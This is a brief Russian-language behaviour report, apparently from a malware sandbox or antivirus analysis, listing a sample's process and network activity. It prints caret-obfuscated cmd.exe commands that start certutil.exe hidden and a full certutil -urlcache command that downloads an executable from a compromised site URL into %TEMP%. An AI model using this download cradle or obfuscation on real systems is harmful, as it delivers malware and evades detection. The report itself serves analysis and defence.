Техническая информация
- '<SYSTEM32>\cmd.exe' /c ^S^T^a^r^T^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^b^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^m^i^N^ ^ ^ ^ ^^^c^^^e^r^^^t^^^U^^^t^I^^^l^^^.^e^X^e^ ^ ^ ^ ^ ^ ^ ^ ^...
- 'vi#.#ypothes.is':443
- DNS ASK vi#.#ypothes.is
- '<SYSTEM32>\cmd.exe' /c ^S^T^a^r^T^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^b^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^m^i^N^ ^ ^ ^ ^^^c^^^e^r^^^t^^^U^^^t^I^^^l^^^.^e^X^e^ ^ ^ ^ ^ ^ ^ ^ ^...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" STarT /b /miN ^c^er^t^U^tI^l^.eXe -UrlCAcHe /sPliT -F https://via.hypothes.is/https://canadacigar...
- '<SYSTEM32>\cmd.exe' /staRT /B /min PInG.exe
- '<SYSTEM32>\certutil.exe' -UrlCAcHe /sPliT -F https://via.hypothes.is/https://canadacigarsupplies.com/wp-content/uploads/2018/05/files/phy__1__31629__2649094674__1605642612.exe %TEMP%\files.exe